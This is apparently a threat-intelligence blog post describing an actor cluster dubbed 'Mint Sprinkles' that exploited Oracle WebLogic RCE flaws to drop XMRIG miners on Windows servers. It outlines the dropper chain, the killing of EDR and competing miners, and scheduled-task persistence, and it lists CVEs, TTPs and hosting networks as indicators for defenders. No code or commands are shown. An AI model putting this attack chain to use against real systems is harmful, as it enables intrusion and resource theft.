Before diving into this activity cluster, be sure to read the series introduction here.
And continue with the rest of the series by clicking the links below:
In this second blog in our ice cream activity cluster series, we look back at a historic actor we’ve dubbed Mint Sprinkles.
When we have sufficient evidence to suggest that the same threat actors are behind different activities, but we observe a significant shift to either the capabilities, attacker infrastructure, or target victims, we build upon the established flavor (in this case, Mint) with a topping, such as sprinkles. This is to represent that although the same actors are likely behind the activity, the way in which we track or cluster the new activity is different. We still believe that this activity is Mint, but it has superficially and significantly evolved enough to warrant: Mint Sprinkles.
You may have noticed that we discussed ‘Mint Evolution’ in one of the headings in the original Mint blog. To be clear, yes, changes were made to their TTPs which were worthwhile discussing. However, the way in which we cluster, and therefore track the group, was mostly unaffected. In this instance, the evolution altered how we cluster and codify the activity.
Evolution of Mint to Mint Sprinkles
As previously documented, Mint typically looks for vulnerable Linux servers, sends an RCE exploit to gain initial access, then sets up persistence mechanisms before hijacking the target’s resources to mine cryptocurrency.
The development observed in the Alert Logic dataset was a shift from targeting Linux to targeting vulnerable Windows machines. The change in target OS required a drastic change in TTPs and capabilities, hence the distinct evolution to Mint with Sprinkles.
Mint Sprinkles exploitation of Windows machines followed Mint’s earlier success in exploiting Linux machines running the Citrix Application Deliver Controller (ADC). Always looking for the latest RCE exploit, one of the exploits they moved onto was the 2020 Oracle WebLogic RCE. Successfully exploiting the vulnerability gave them remote access, but unlike the Citrix ADC, Oracle’s WebLogic software can run on both Linux and Windows systems.
Initially, we observed the classic Mint tactics on the Windows devices, pulling down .sh files and attempting to run Linux based commands unsuccessfully. Threat Hunters discovered Windows PowerShell logs that effectively said; “command doesn’t exist.” Mint would understand that for them to get to this stage, the exploit had been successful, but a good portion of victims were no longer moving onto the installation stage.
Mint tends to use spray and pray techniques to find vulnerable servers. Often attempting the exploit as their first action, thereby condensing the recon, delivery, and exploit stages of the kill chain.
In scenarios where we did observe a distinct recon and exploit phase, it was noted that no operating system ID was included, meaning Mint was not looking to differentiate between operating systems. It is our hypothesis that the shift to Windows tactics was the group’s response to capitalize on the inadvertent access to Windows machines they had gained during the Oracle WebLogic campaign.
Essentially, they now had control of Windows machines and Linux machines, but their existing TTPs would not allow them to monetize this access on the Windows machines.
This resulted in the creation of a new set of Windows centric capabilities, taking a different route but ultimately ending at the same outcome, dropping crypto miners.
The techniques, tactics, and procedures used remain consistent in the reconnaissance, delivery, and exploit phase across both Mint and Mint Sprinkles. Shifting focus to Windows servers required Mint Sprinkles to employ tactics that will work on windows machines, but key common indicators remained. For example, a consistent filename was observed, with the addition of a ‘w’ character to flag for windows, and a change in dropper filetype.
The first .xml dropper pulled a second dropper, 1.ps1, which would kill off known competition, other miners, kill security prevention processes (such as EDR) and establish persistence via a scheduled task.
Mint Sprinkles then pulled an XMRIG miner, alongside a config.json file which included instructions on how to mine, the login details, the mining pool, and established command and control to the miner. Elements of the configuration have been consistent across victims and have been used to help attribute activity to Mint and Mint Sprinkles.
The actions performed by the new files resulted in the same outcomes typical of Mint. The attacker infrastructure also remained consistent in both Mint and Mint Sprinkles; again, they favored Russian and ex-Soviet IP addresses. Please keep in mind that the attacker infrastructure geo-locations do not amount to attribution.
All the points discussed, as well as indicators we have withheld from publication, strongly suggest that this is an evolution of the Mint flavor. The adaptation of the flavor’s capabilities to work with Windows machines warrants a distinction in nomenclature – hence Mint Sprinkles.
Known Exploits Used
- CVE-2020-14882 [exp]
- CVE-2020-14750 [exp]
- Active Scanning – T1595 [recon]
- Exploit Public-Facing Application – T1190 [recon/delivery/exploit]
- Constant User-Agent [recon/delivery/exploit/C2]
- …w.xml [inst dropper]
- 1.ps1 [inst AoO]
- Scheduled Task/Job: Scheduled Task – T1053.005 [inst/persistence]
- config.json [inst/AoO]
- xmrig.exe [inst/AoO]
- Ingress Tool Transfer – T1105 [inst/C2]
- XMRIG Crypto mining [AoO]
- Resource hijacking – T1496 [AoO]
- Vulnerable Windows Servers
- PINDC-AS [recon]
- RMINJINERING [recon]
- SELECTEL [recon]
- LLC BAXET [Inst]
- EUROBYTE Eurobyte LLC [inst]
- NTSERVICE-AS [inst]
Actions on Objectives
- Crypto mining (XMRIG)
Next in the series: